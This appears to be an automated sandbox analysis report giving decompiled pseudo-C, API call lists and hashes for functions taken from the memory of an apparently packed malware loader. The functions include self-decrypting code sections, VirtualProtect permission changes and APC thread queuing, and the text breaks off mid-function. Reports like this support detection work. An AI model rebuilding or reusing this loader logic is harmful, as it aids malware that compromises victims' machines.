Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 76c5feab4d8c4f4721dfdf87ed70e59932e95b962e652ec09225abbf4e64c766
Instruction ID: 762d3d0a26d8eb83aab8d25b8ddfa86d609db4b479fe29e047e53511122fe51e
Opcode Fuzzy Hash: 76c5feab4d8c4f4721dfdf87ed70e59932e95b962e652ec09225abbf4e64c766
Instruction Fuzzy Hash: F351F3F1F0025AFBDB20ABB4DC89E6E77B8AF08728F484467E501D7240E6B4D545DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00981D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x9830e0 = _t1;
				if(_t1 != 0) {
					 *0x9830f0 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E009819A0(); // executed
					_t6 = _t4;
					HeapDestroy( *0x9830e0);
				}
				ExitProcess(_t6);
			}

0x00981d39
0x00981d42
0x00981d48
0x00981d4f
0x00981d58
0x00981d5d
0x00981d63
0x00981d6e
0x00981d70
0x00981d70
0x00981d77

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00981D42
GetModuleHandleA.KERNEL32(00000000), ref: 00981D52
GetCommandLineW.KERNEL32 ref: 00981D5D

Part of subcall function 009819A0: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 009819DF
Part of subcall function 009819A0: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00981A26
Part of subcall function 009819A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00981A55
Part of subcall function 009819A0: GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 00981A73
Part of subcall function 009819A0: CreateThread.KERNEL32 ref: 00981A9D
Part of subcall function 009819A0: QueueUserAPC.KERNEL32(009813C4,00000000,?,?,00000000), ref: 00981AB9

HeapDestroy.KERNEL32 ref: 00981D70
ExitProcess.KERNEL32 ref: 00981D77

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
String ID:
API String ID: 2501132232-0
Opcode ID: 7aedc5355d4b69e1816ad38af0f3aea69a2aaac7a6275aa91a2783214c7beeeb
Instruction ID: ef0507fc191572e79958ecb505ee1283424d1423eece604e842e1abbdefbf120
Opcode Fuzzy Hash: 7aedc5355d4b69e1816ad38af0f3aea69a2aaac7a6275aa91a2783214c7beeeb
Instruction Fuzzy Hash: 82E0B63592A6209BC3212F71AC0DB4A3E68BF06B917244519F406E2360D7354501FBA9

Uniqueness

Uniqueness Score: -1.00%

Function 07F78A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 07F78A76
SysAllocString.OLEAUT32(07F74BD8), ref: 07F78ABA
SysFreeString.OLEAUT32(00000000), ref: 07F78ACE
SysFreeString.OLEAUT32(00000000), ref: 07F78ADC

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 3ca24cb6356037e6a84d419c7be5fbb78641d2dcb7bf27d9ad6370dbd63bd492
Instruction ID: 5f3e7b3144cb1b8c6d8033667da6fdea1ae28e726dda593dc91f06aa2a71923a
Opcode Fuzzy Hash: 3ca24cb6356037e6a84d419c7be5fbb78641d2dcb7bf27d9ad6370dbd63bd492
Instruction Fuzzy Hash: 66310CB2900209FFDB05DFA8D8C58AE7BB9FF48344B24846EF906D7250E7349941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009814AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E009814AD(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x9830f0;
				_t46 = E00981B54(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x983100;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x9841a7; // 0x9841a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00981B1C(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x983100 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x009814b4
0x009814c4
0x009814c9
0x009814ce
0x009814e3
0x009814ea
0x009814ef
0x00981500
0x00981503
0x00981509
0x0098150e
0x009815c1
0x00981514
0x00981514
0x0098151a
0x00981589
0x0098151c
0x0098151c
0x0098151f
0x00981521
0x00981529
0x0098152c
0x0098152f
0x00981537
0x00981542
0x00981543
0x00981544
0x00981561
0x0098156f
0x00981576
0x00981579
0x0098157c
0x00981584
0x00000000
0x00000000
0x00981534
0x00981534
0x00981586
0x00981593
0x009815a8
0x00981595
0x0098159e
0x009815a3
0x009815b9
0x009815b9
0x009815c8
0x009815ce

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00981A1F,00000000), ref: 00981503
memcpy.NTDLL(?,00981A1F,?,?,?,?,?,?,?,00981A1F,00000000,00000030,?,00000000), ref: 0098159E
VirtualFree.KERNELBASE(00981A1F,00000000,00008000,?,?,?,?,?,?,00981A1F,00000000), ref: 009815B9

Strings

Sep 21 2021, xrefs: 0098153A

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 21 2021
API String ID: 4010158826-1195158264
Opcode ID: aaea2d5d66895a71a79e7ff581ba4e273f3c3948f0b4cad695655a0e9bf5bffb
Instruction ID: f44796896bd18ce1229694b9f4886bd3a46664f0550e801eaf6e23844e211cdb
Opcode Fuzzy Hash: aaea2d5d66895a71a79e7ff581ba4e273f3c3948f0b4cad695655a0e9bf5bffb
Instruction Fuzzy Hash: 8F311971E0021AEFDB00DF94D881BEEB7B8BF48704F104169E906BB380D775AA06DB94

Uniqueness

Uniqueness Score: -1.00%

Function 07F71128, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E07F71128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x7f7d32c; // 0x8a295b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x7f7d32c; // 0x8a295b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x7f7d030) {
					HeapFree( *0x7f7d238, 0, _t8);
				}
				_t9 = E07F74A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x7f7d32c; // 0x8a295b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x07f71128
0x07f71128
0x07f71131
0x07f71141
0x07f71141
0x07f71146
0x07f7114b
0x00000000
0x00000000
0x07f7113b
0x07f7113b
0x07f7114d
0x07f71151
0x07f71163
0x07f71163
0x07f7116e
0x07f71173
0x07f71176
0x07f7117b
0x07f7117f
0x07f71185

APIs

RtlEnterCriticalSection.NTDLL(08A29570), ref: 07F71131
Sleep.KERNEL32(0000000A,?,07F730F3), ref: 07F7113B
HeapFree.KERNEL32(00000000,00000000,?,07F730F3), ref: 07F71163
RtlLeaveCriticalSection.NTDLL(08A29570), ref: 07F7117F

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 21ab50cc34fc09f7f4efa03f063e2b5dc5a69e3a1dce4d6034d8dcb36d236ea1
Instruction ID: 068817c617fe004a45e2f03a21e378411e93035ab54a0f5f5fe18c9664caec45
Opcode Fuzzy Hash: 21ab50cc34fc09f7f4efa03f063e2b5dc5a69e3a1dce4d6034d8dcb36d236ea1
Instruction Fuzzy Hash: 40F05EB07002499FD7108F74EC4AF167BECAF44749B48840AF505CA350C624E855DB25

Uniqueness

Uniqueness Score: -1.00%

Function 07F75319, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F75319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E07F7155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x7f7d2a8; // 0xaaa5a8
				_t4 = _t24 + 0x7f7edc0; // 0x8a29368
				_t5 = _t24 + 0x7f7ed68; // 0x4f0053
				_t45 = E07F75D79( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x7f7d2a8; // 0xaaa5a8
						_t11 = _t32 + 0x7f7edb4; // 0x8a2935c
						_t48 = _t11;
						_t12 = _t32 + 0x7f7ed68; // 0x4f0053
						_t52 = E07F7272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x7f7d2a8; // 0xaaa5a8
							_t13 = _t35 + 0x7f7edfe; // 0x30314549
							if(E07F75B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x7f7d25c - 6;
								if( *0x7f7d25c <= 6) {
									_t42 =  *0x7f7d2a8; // 0xaaa5a8
									_t15 = _t42 + 0x7f7ec0a; // 0x52384549
									E07F75B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x7f7d2a8; // 0xaaa5a8
							_t17 = _t38 + 0x7f7edf8; // 0x8a293a0
							_t18 = _t38 + 0x7f7edd0; // 0x680043
							_t45 = E07F74538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x7f7d238, 0, _t52);
						}
					}
					HeapFree( *0x7f7d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E07F74FF0(_t54);
				}
				return _t45;
			}

0x07f75319
0x07f75329
0x07f7532c
0x07f75333
0x07f75335
0x07f75335
0x07f75338
0x07f7533d
0x07f75344
0x07f75356
0x07f7535a
0x07f75368
0x07f75376
0x07f7537a
0x07f7540b
0x07f7540b
0x07f75380
0x07f75380
0x07f75385
0x07f75385
0x07f7538c
0x07f75398
0x07f7539a
0x07f7539c
0x07f7539e
0x07f753a5
0x07f753b7
0x07f753b9
0x07f753c0
0x07f753c2
0x07f753c9
0x07f753d4
0x07f753d4
0x07f753c0
0x07f753d9
0x07f753de
0x07f753e5
0x07f75403
0x07f75405
0x07f75405
0x07f7539c
0x07f75417
0x07f75417
0x07f75419
0x07f7541e
0x07f75420
0x07f75420
0x07f7542b

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,08A29368,00000000,?,7519F710,00000000,7519F730), ref: 07F75368
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,08A293A0,?,00000000,30314549,00000014,004F0053,08A2935C), ref: 07F75405
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,07F77CCB), ref: 07F75417

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 32a03cbb3e67929413ff3aa11bc90ceb78128923fc31200e9407d337a9f7ad4d
Instruction ID: e09d8a9c8f16443834d0e4280a0957f1afe245cba70f05a0e8f222ac52679889
Opcode Fuzzy Hash: 32a03cbb3e67929413ff3aa11bc90ceb78128923fc31200e9407d337a9f7ad4d
Instruction Fuzzy Hash: 0C31A1B2A00109FFDB11DBA4DCC5D9E7BBDEF44704F1800ABE5049B160D7709A5ADB60

Uniqueness

Uniqueness Score: -1.00%

Function 07F72C58, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E07F72C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x7f7d340; // 0x8a29b90
				_push(0x800);
				_push(0);
				_push( *0x7f7d238);
				if( *0x7f7d24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x7f7d24c =  *0x7f7d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E07F72C0D(_t44, _t40);
						_t18 = E07F731A8(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x7f7d24c < 5) {
								 *0x7f7d24c =  *0x7f7d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E07F75433();
						HeapFree( *0x7f7d238, 0, _t40);
						goto L10;
					}
					_t24 = E07F79BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E07F75450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}

0x07f72c58
0x07f72c58
0x07f72c5b
0x07f72c5c
0x07f72c66
0x07f72c6d
0x07f72c72
0x07f72c74
0x07f72c7a
0x07f72c9a
0x07f72ca2
0x07f72cba
0x07f72cbc
0x07f72cbd
0x07f72cbf
0x07f72cfd
0x07f72cfd
0x07f72d03
0x07f72d09
0x07f72d09
0x07f72cc1
0x07f72cc7
0x07f72cca
0x07f72cd9
0x07f72cdb
0x07f72ce2
0x07f72d16
0x07f72d1b
0x07f72d1d
0x07f72d1f
0x07f72d1f
0x00000000
0x07f72d1d
0x07f72ce4
0x07f72ce9
0x07f72cf7
0x00000000
0x07f72cf7
0x07f72cb1
0x07f72cb6
0x07f72cb6
0x00000000
0x07f72cb6
0x07f72c84
0x00000000
0x00000000
0x07f72c93
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 07F72C7C

Part of subcall function 07F75450: GetTickCount.KERNEL32 ref: 07F75464
Part of subcall function 07F75450: wsprintfA.USER32 ref: 07F754B4
Part of subcall function 07F75450: wsprintfA.USER32 ref: 07F754D1
Part of subcall function 07F75450: wsprintfA.USER32 ref: 07F754FD
Part of subcall function 07F75450: HeapFree.KERNEL32(00000000,?), ref: 07F7550F
Part of subcall function 07F75450: wsprintfA.USER32 ref: 07F75530
Part of subcall function 07F75450: HeapFree.KERNEL32(00000000,?), ref: 07F75540
Part of subcall function 07F75450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 07F7556E
Part of subcall function 07F75450: GetTickCount.KERNEL32 ref: 07F7557F

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 07F72C9A
HeapFree.KERNEL32(00000000,00000002,07F77D16,?,07F77D16,00000002,?,?,07F7312C,?), ref: 07F72CF7

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 2562d2733c18ac9f6bbb3e464adb0959168a809ae3d54f5c2ff1c7a0a16ead93
Instruction ID: 91b3707e8eefc7253ddda8344d1b0d9ea305e9165d1501de1a4373e322e256e0
Opcode Fuzzy Hash: 2562d2733c18ac9f6bbb3e464adb0959168a809ae3d54f5c2ff1c7a0a16ead93
Instruction Fuzzy Hash: 3F218BB2200219EBCB119F68DC85E9A37BCFF49319F18402BF901DB250DB74E941DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00981BAE, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00981BAE(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x983100;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00981bb8
0x00981bc5
0x00981bcb
0x00981bd7
0x00981be7
0x00981be9
0x00981bf1
0x00981c86
0x00981c8d
0x00000000
0x00000000
0x00000000
0x00981bf7
0x00981bf7
0x00981bf7
0x00981bfb
0x00000000
0x00000000
0x00981c07
0x00981c0b
0x00981c2f
0x00981c33
0x00981c47
0x00981c47
0x00981c4d
0x00981c5c
0x00981c60
0x00981c68
0x00981c68
0x00981c70
0x00981c73
0x00981c80
0x00000000
0x00000000
0x00000000
0x00000000
0x00981c80
0x00981c3b
0x00981c3f
0x00981c45
0x00000000
0x00000000
0x00000000
0x00981c45
0x00981c13
0x00981c17
0x00981c21
0x00981c19
0x00981c19
0x00981c19
0x00000000
0x00981c17
0x00000000

APIs

VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00981BE7
VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00981C5C
GetLastError.KERNEL32 ref: 00981C62

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 7fbeac14f6f5a7c64d82800ffc220f5bbae057ccf99920389a02f7597623b170
Instruction ID: 375a3aca7adf036450391a1aefd6ee4195d2b8120a12219706c838550ec6e04b
Opcode Fuzzy Hash: 7fbeac14f6f5a7c64d82800ffc220f5bbae057ccf99920389a02f7597623b170
Instruction Fuzzy Hash: 29214F7180020ADFCB18EF95C885AB9F7F8FF18345F11445AD242D7219E3B4AA65DF58

Uniqueness

Uniqueness Score: -1.00%

Function 07F74A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E07F74A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E07F71525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x7f7c284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x07f74a2e
0x07f74a3b
0x07f74a3d
0x07f74a3e
0x07f74a46
0x07f74a46
0x07f74a4a
0x00000000
0x00000000
0x07f74a41
0x07f74a42
0x07f74a45
0x07f74a45
0x07f74a52
0x07f74a57
0x07f74a5c
0x07f74a64
0x07f74a6a
0x07f74a6c
0x07f74a6f
0x07f74a73
0x07f74a75
0x07f74a78
0x07f74a78
0x07f74a79
0x07f74a7b
0x07f74a78
0x07f74a85
0x07f74a88
0x07f74a8b
0x07f74a8c
0x07f74a8e
0x07f74a95
0x07f74a95
0x07f74aa1

APIs

StrChrA.SHLWAPI(?,00000020,00000000,08A295AC,07F730F3,?,07F71173,?,08A295AC,?,07F730F3), ref: 07F74A46
StrTrimA.SHLWAPI(?,07F7C284,00000002,?,07F71173,?,08A295AC,?,07F730F3), ref: 07F74A64
StrChrA.SHLWAPI(?,00000020,?,07F71173,?,08A295AC,?,07F730F3), ref: 07F74A6F

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 9597e8b9f4d2c71cff1d99f7fc77f62a619d026afe557e5e925d988b7ae2bbe0
Instruction ID: 4dc6700b461452ab5a5de0f19e0d0103f09fcefbe2e97b00c60149a53fcbf58f
Opcode Fuzzy Hash: 9597e8b9f4d2c71cff1d99f7fc77f62a619d026afe557e5e925d988b7ae2bbe0
Instruction Fuzzy Hash: CC01BCF2700387AEF7204E6A8C48F777B9DEBC9754F485012B945CB282DA70C802C768

Uniqueness

Uniqueness Score: -1.00%

Function 6EB21A81, Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,6EB21BB8,?,?,6EB21A2A,00000000), ref: 6EB21AB2
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,6EB21BB8,?,?,6EB21A2A,00000000), ref: 6EB21AC8
ExitThread.KERNEL32 ref: 6EB21AD1

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThread$CloseFreeHandleLibrary
String ID:
API String ID: 2705336791-0
Opcode ID: 952b40cd5d1f212ee793c902d45a987c43810e7621cf39e1bd7312d6a88012b2
Instruction ID: 995de715d5b8ac8943f80c90d98bd05f15f81c236a27730396c54b1e237542d5
Opcode Fuzzy Hash: 952b40cd5d1f212ee793c902d45a987c43810e7621cf39e1bd7312d6a88012b2
Instruction Fuzzy Hash: E3F05430510A816FDB515AB58914A7A3EACEF02220F298B34F838C71E4D732D949C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 07F746B2, Relevance: 3.9, APIs: 3, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E07F746B2(void* __eflags, int _a4) {
				signed int _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				char* _v24;
				int _v28;
				void* _v40;
				char _v44;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void _v88;
				char _v92;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				signed int _t52;
				signed int _t53;
				signed int _t55;
				void* _t67;
				void* _t74;
				void* _t76;
				WCHAR* _t80;
				intOrPtr _t82;

				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
